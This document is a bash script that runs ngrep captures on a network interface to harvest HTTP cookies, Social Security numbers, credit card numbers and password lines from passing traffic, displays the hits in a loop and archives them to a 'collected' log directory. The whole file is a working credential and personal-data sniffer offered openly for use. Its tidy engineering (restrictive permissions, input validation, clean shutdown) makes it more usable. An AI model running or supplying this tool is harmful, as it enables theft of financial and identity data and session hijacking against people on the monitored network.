#!/bin/bash
# Script for searching the wire for SSNs/CCNs

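# The capture files hold cookies, card numbers, SSNs and passwords taken off
# the wire, so everything this script creates is owner-only.
umask 077

out_dir="$PWD/temp"
log_dir="$PWD/../collected"

# The interface name may be handed over through a file in /tmp. /tmp is
# world-writable, so the content is treated as untrusted: only the first line
# is read and it must look like an interface name, otherwise eth0 is used.
iface="eth0"
iface_file="/tmp/fonIFACE.tmp"
if [ -f "$iface_file" ]; then
  candidate=""
  IFS= read -r candidate < "$iface_file" || true
  if [[ "$candidate" =~ ^[A-Za-z0-9][A-Za-z0-9_.:-]*$ ]]; then
    iface="$candidate"
  else
    printf '[!] Ignoring invalid interface name in %s; using %s\n' \
      "$iface_file" "$iface" >&2
  fi
fi

mkdir -p -- "$out_dir" || {
  printf '[!] Cannot create %s\n' "$out_dir" >&2
  exit 1
}

#######################################
# Stop the capture jobs started by this script, append their output to a
# timestamped log under $log_dir and remove the per-pattern capture files.
# Globals:   out_dir (read), log_dir (read)
# Arguments: none
# Outputs:   a warning on stderr when the log cannot be written
#######################################
cleanup() {
  trap - EXIT INT TERM
  local pids stamp
  local -a outs

  # Only this script's own background jobs are signalled, and with TERM, so
  # unrelated ngrep processes on the host are left alone.
  pids=$(jobs -p)
  if [ -n "$pids" ]; then
    # shellcheck disable=SC2086 — one PID per word is intended
    kill $pids 2> /dev/null
    wait 2> /dev/null # let tee flush before the files are archived
  fi

  # %M is minutes; %m would repeat the month number in the file name.
  stamp=$(date +"%b-%d_%H:%M:%S")
  outs=("$out_dir"/*.out)
  if [ -e "${outs[0]}" ]; then
    # Remove the capture files only once they are safely in the log.
    if cat -- "${outs[@]}" >> "$log_dir/ngrep_$stamp.log"; then
      rm -f -- "${outs[@]}"
    else
      printf '[!] Could not write to %s; capture files left in %s\n' \
        "$log_dir" "$out_dir" >&2
    fi
  fi
}

# The display loop below never ends on its own, so the clean-up has to run
# from a trap to be reached at all.
trap cleanup EXIT
trap 'exit 130' INT
trap 'exit 143' TERM

# Capture Cookies
ngrep -q -d "$iface" -W byline -i 'Cookie:' | tee "$out_dir/COOKIE.out" &
# Capture Social Security Numbers
ngrep -q -d "$iface" -W single -w '[0-9]{3}\-[0-9]{2}\-[0-9]{4}' | tee "$out_dir/SSN.out" &
# Capture Credit Card Numbers
ngrep -q -d "$iface" -W single '[0-9]{4}\-[0-9]{4}\-[0-9]{4}\-[0-9]{4}' | tee "$out_dir/CCN.out" &
# Capture Passwords
ngrep -q -d "$iface" -W single -i 'password' | tee "$out_dir/PASS.out" &

while true; do
  # Cookie output is read only for the "anything still empty?" check below;
  # it is not echoed here.
  cookie_hits=$(cat -- "$out_dir/COOKIE.out" 2> /dev/null)
  # Read the file the capture actually writes (CCN.out, not CCN2.out).
  ccn_hits=$(cat -- "$out_dir/CCN.out" 2> /dev/null)
  ssn_hits=$(cat -- "$out_dir/SSN.out" 2> /dev/null)
  pass_hits=$(cat -- "$out_dir/PASS.out" 2> /dev/null)
  sleep .5
  echo "[*] Outputting collected potential ngrep information..."
  printf '%s\n\n' "$ccn_hits"
  printf '%s\n\n' "$ssn_hits"
  printf '%s\n\n' "$pass_hits"
  # Back off while at least one category has produced nothing yet.
  if [[ -z "$ccn_hits" || -z "$ssn_hits" || -z "$pass_hits" || -z "$cookie_hits" ]]; then
    sleep 10
  fi
done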
